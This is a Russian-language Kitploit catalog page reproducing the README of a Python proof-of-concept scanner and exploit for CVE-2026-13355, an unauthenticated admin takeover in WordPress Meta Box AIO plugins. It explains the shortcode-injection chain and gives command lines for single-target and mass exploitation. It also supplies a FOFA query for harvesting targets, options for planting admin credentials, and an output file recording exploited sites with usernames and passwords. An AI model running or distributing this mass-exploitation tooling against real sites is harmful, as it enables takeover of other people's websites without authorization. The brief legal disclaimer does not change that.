Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-13355 — Python PoC-сканер и эксплойт для CVE-2026-13355 — неаутентифицированное повышение привилегий до администратора в WordPress-плагинах Meta Box AIO, с массовым сканированием через FOFA. | Kitploit
Инструменты/GitHubGitHub/murrez/cve-2026-13355
Повышение привилегийРазведкаСканеры уязвимостейЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubmurrez/cve-2026-13355

CVE-2026-13355

Python PoC-сканер и эксплойт для CVE-2026-13355 — неаутентифицированное повышение привилегий до администратора в WordPress-плагинах Meta Box AIO, с массовым сканированием через FOFA.

31 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

CVE-2026-13355 — Неаутентифицированное повышение привилегий до администратора в Meta Box AIO

Python 3 proof-of-concept сканер и эксплойт для CVE-2026-13355 в WordPress-сборке Meta Box AIO (и связанных расширениях MB Frontend Submission / MB User Profile).

ПлатформаWordPress plugin
КомпонентMeta Box AIO
ЗатронутоMeta Box AIO ≤ 3.11.0; MB Frontend Submission ≤ 4.5.6; MB User Profile ≤ 3.11.0
Исправлено вMeta Box AIO 3.12.0+ (авторизация в Form::process())
CVSS9.8 Critical
АутентификацияНе требуется
CWECWE-269 — Improper Privilege Management
Исследовательh0xilo (Wordfence)

Краткое описание

Цепочка уязвимостей в двух встроенных расширениях позволяет неаутентифицированно создавать учётную запись администратора:

  1. MB Frontend Submission (mbfs) — rwmb_frontend_field_object_id переопределяет целевой объект формы без проверки прав; Form::process() не вызывает user_can_edit(), поэтому атакующий может выполнить wp_update_post() и перезаписать post_content произвольных записей/страниц.
  2. MB User Profile (mbup) — внедрённые атрибуты шорткода [mb_user_profile_register role="administrator" auto_login="true"] принимаются без проверки роли.

Важно: цепочка эксплойта требует публичной формы mbfs (frontend submission), а не только форм входа mbup. Многие результаты FOFA предоставляют лишь интерфейс входа/регистрации mbup — они помечаются как plugin_mbup_only и не эксплуатируются данной цепочкой.

Требования

  • Python 3.8+
  • pip install -r requirements.txt

Быстрый старт

root@kitploit:~
pip install -r requirements.txt

# Single target — check (live terminal flow by default)
python poc.py -u https://target.example --mode check

# Mass check (one line per target unless --quiet)
python poc.py --list targets.example.txt --mode check --threads 20

# Single target — exploit (needs mbfs form URL + post ID)
python poc.py -u https://target.example --mode exploit \
  --form-url /contact/ --object-id 12 --verify

# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 5 --verify

FOFA → список целей

Пример запроса:

root@kitploit:~
body="/wp-content/plugins/meta-box-aio/"

Нормализация экспорта FOFA в CSV:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
# writes list.txt + normalized CSV (local only, gitignored)
python poc.py --list list.txt --mode check --threads 20

Параметры CLI

Выходные файлы

Используйте --vuln-list exploited.txt при запусках exploit, чтобы попадания из hits.txt не перезаписывались.

Значения status при проверке

Замечания по эксплуатации

  • Этап отравления отправляет POST с post_content через форму mbfs с ?rwmb_frontend_field_object_id=<id>.
  • Успех требует, чтобы внедрённый шорткод отрендерился на отравленной странице (без strip/KSES, пропатченного плагина, неправильного типа формы).
  • Формы mbfs для контактов/рассылок часто не имеют реального поля post_content; перезапись на практике может не сработать.
  • HTTP 403 при POST обычно указывает на блокировку WAF/хостингом.

Структура репозитория

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Локальные списки сканирования и артефакты запусков (list.txt, fofa*.csv, *.jsonl, hits*.txt, …) указаны в .gitignore и не должны коммититься.

Ссылки

  • NVD — CVE-2026-13355
  • Wordfence advisory
  • Meta Box AIO changelog

Правовая информация

Только для авторизованного тестирования безопасности и обучения. Вы несёте ответственность за соблюдение применимых законов и правил программ.

Скачать инструмент
ПараметрОписание
-u, --urlОдин базовый URL
--listСписок URL, нормализованный FOFA CSV (колонка url) или candidates.jsonl
--modecheck или exploit
--form-urlСтраница с [mb_frontend_form ...] / mbfs-form
--object-idID записи/страницы для rwmb_frontend_field_object_id
--pathsДополнительные пути для обхода в поисках frontend-форм
--username, --email, --passwordУчётные данные для регистрации (exploit)
--shortcodeВнедряемая полезная нагрузка post_content (по умолчанию шорткод регистрации администратора)
--verifyПодтверждение через /wp-admin/ или wp-login.php после регистрации
--flowПотоковый вывод по одной строке на цель при массовых запусках (по умолчанию с --list)
--no-flowТолько сводка о прогрессе
--quiet, -qМинимальный вывод в консоль
--threads, -jПараллелизм при массовых запусках (по умолчанию 15)
--outputJSONL-лог (по умолчанию cve_2026_13355_results.jsonl)
--vuln-listТекстовые строки попаданий / эксплуатированных целей (по умолчанию hits.txt / используйте exploited.txt для exploit)
--candidates-listJSONL с метаданными проверки (по умолчанию candidates.jsonl)
ФайлРежимСодержимое
cve_2026_13355_results.jsonlобаПолный JSON по каждой цели
hits.txtcheckURL с candidate_mbfs
candidates.jsonlcheckform_url, object_id, подсказки о версии
exploited.txtexploiturl|user|email|pass|oid=…
СтатусЗначение
candidate_mbfsПлагин присутствует + найдена форма MB Frontend Submission (эксплуатация возможна)
plugin_mbup_onlyТолько формы входа/регистрации User Profile — не данная цепочка CVE
plugin_no_frontend_formsОтпечаток плагина есть, frontend-формы rwmb не обнаружены
patchedВерсия выше затронутого диапазона (если удаётся определить)
no_pluginMeta Box AIO / расширения не обнаружены